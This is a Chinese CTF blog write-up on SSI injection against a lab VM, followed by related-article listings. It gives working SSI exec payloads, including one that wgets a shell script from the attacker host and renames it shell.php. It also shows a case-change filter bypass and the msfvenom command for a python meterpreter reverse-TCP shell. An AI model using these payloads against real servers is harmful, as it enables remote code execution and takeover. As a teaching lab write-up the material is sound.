SSI注入

最新推荐文章于 2024-09-10 23:48:01 发布
最新推荐文章于 2024-09-10 23:48:01 发布
阅读量232 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/101685505
版权

ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果

若在网站目录中发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击

攻击机192.168.1.108

靶机192.168.1.109

nikto -host ip

+ Multiple index files found: /index.php, /index.shtml

dirb http://192.168.1.109

发现ssi可以注入

发现两个敏感文件

 

SSL注入漏洞

列举当前目录的文件和目录

<--#exec cmd="ls" --> 

切换到指定目录

<--#exec cmd="cat /root/dir" --> 

下载shell脚本,并重命名为shell.php

<--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" --> 

target注释掉了<

feedback 注释掉了exec,将其改为大写,大小写绕过

但没有给出反馈

SSI注入需要加一个感叹号

反弹shell

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw > /root/Desktop/shell.py

攻击机启动监听

将shell移到/var/www/html根目录下,并开启apache

返回shell

sysinfo 查看系统信息

shell进入系统shell

优化终端

^BonnenuIt
关注
专栏目录
CTF之SSI注入
afei001
02-03 440
SSI注入攻击介绍     SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI注入漏洞来执行系统命令,并返回对应的结果。     如果在网站目录中发现了stm、shtm、shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被SSI注入攻击。 练习环境 攻击机:kali 靶机:Ubuntu 16.04.3 1. 发现靶机,并对端口进...
网络安全[脚本小子] -- SSI注入
Skycrab
10-01 7343
本系列文章将与大家一起学习探讨网络安全知识,但我们不做脚本小子。 在计算机和网络领域里,脚本小子(script kiddie)是一个贬义词用来描述以黑客自居并沾沾自喜的初学者。 他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好, 但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正伟大的黑客来说是必须具备的素质。 他们常常从某些网站上复制脚本
SSI注入漏洞
Hydra的博客
11-19 9557
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
bWAPP----Server-Side Includes (SSI) Injection
weixin_30556959的博客
07-20 248
Server-Side Includes (SSI) Injection 什么是SSISSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执...
SSL 注入漏洞
最新发布
m0_57836225的博客
09-10 978
SSL(Secure Sockets Layer)及其继任者 TLS(Transport Layer Security)是用于在网络上建立安全连接的加密协议。它们确保在客户端和服务器之间传输的数据是加密的,防止数据被窃听、篡改或伪造。SSL/TLS 广泛应用于各种网络通信场景,如网页浏览(HTTPS)、电子邮件(SSL/TLS 加密的邮件传输)、VPN 连接等。中间人攻击(MITM)基础。
bWAPP--SSI Injection
hee_mee的博客
09-18 287
zeroNIl
SSI注入实战
qq_23347209的博客
05-28 1290
文章目录靶机环境一、服务器信息搜集二、网站信息搜集1.使用nikto扫描网站目录2.浏览网站三、SSI注入漏洞利用1、SSI注入简介:2、SSI注入测试网站四、利用nc反弹shell——失败五、使用msf框架1、python木马生成2、建立木马监听端3、上传木马文件到本地web服务器上4、构造SSI注入语句执行木马 靶机环境 靶机下载网站:https://www.vulnhub.com/ 使用Vmware虚拟机中NAT网络 靶机 192.168.146.150 攻击机 parrot 192.168.14
CTF-12.web安全SSI注入
woo233的博客
09-20 779
SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。实验环境攻击机: kali 192.168.1.103靶场机器: linux 192.168.1.106在ctf比赛中,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;
CTF之Web安全SSI注入
小王的储物间
03-29 410
SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于SSI漏洞服务器有很多过滤机制,需要进行绕过,比如大小写。防御措施:一、进行过滤,过滤这些语法中的特殊字符二、关闭服务器SSI相关功能。
SSI.zip_SSI_SSI Injection代码
09-22
SSI注入,即SSI Injection,是指攻击者通过输入恶意的SSI指令到应用程序中,来利用服务器的SSI功能,获取敏感信息或执行非法操作。这种漏洞常见于用户可控的数据被直接插入到包含SSI指令的页面中,例如评论、表单...
ftp系实战和ssl注入实战
weixin_51339377的博客
03-30 638
nmap进行扫描 发现目标开启的21号端口 ftp的服务 看到了ProFTPD 可以考虑一下使用一些其现成的漏洞 搜索漏洞库 我们也可以在msf中进行搜索 直接使用相应的漏洞即可 这是利用了一些软件的旧版本所存在的漏洞进行的提权 接下来是ssl注入实战 第一步正常nmap扫描 发现只开放了80端口 所以只能从web端入手了 后续发现网站url上是shtml 说明可能存在ssl注入的可能 使用nikto对其进行扫描 有可能存在ss...
SSI漏洞注入
weixin_45007073的博客
01-04 946
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
超详细SSTI模板注入漏洞原理讲解
qq_61955196的博客
08-11 5106
本文指在让第一次接触SSTI注入漏洞的师傅们能更加详细的了解和明白该漏洞的原理
网络安全入门过程教程:服务器端模板注入 (SSTI)
qingkahui24689的博客
05-12 705
每个应用程序都会有动态的部分,“动态的部分” 是经过服务器传输展示的。例如:微信卡片左边固定展示:昵称、性别、微信号、地区。而右边是你的个人信息。左边是固定的,右边是动态的(你可以任意更改)。服务器模板就是提供一种快捷美观的方法来写代码展示出来。php复制代码
从零基础认识SQL注入
你不知道你不知道的事
09-30 3万+
SQL注入1.什么是SQL注入 看一下下面的案例场景,这是正常情况下的登陆场景: 而当我们使用 用户名‘:– 的时候,密码随便输入也可以登陆成功↓ 这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且将后半句检索条件注释起来达到免密码登陆效果。 sql注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情
SQL注入——入门篇
热门推荐
个人笔记
07-09 4万+
SQL注入 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl + Q 插入链接 Ctrl + L 插入代码 Ctrl + K 插入图片 Ctrl + G 提升标题 Ctrl + H 有序列表 Ctrl + O 无序列表 Ctrl + U 横线 Ctrl + R 撤销 Ctrl + Z 重做 ...
针对SSL的中间人攻击演示和防范
hellotjc的专栏
01-12 1407
1 中间人攻击概述 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 随着计算机通信网技术的不断发展,MITM攻击也越来越多样
Myeclipse SSI框架搭建步骤详解
本文档主要介绍了如何在MyEclipse 8.6环境中使用SSI(Server Side Includes)框架进行搭建,结合JDK 1.6、Tomcat 6.0、Spring 3.0、Struts 1.2和iBatis。以下是详细的步骤和配置: 1. **环境配置**: - 开发工具:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值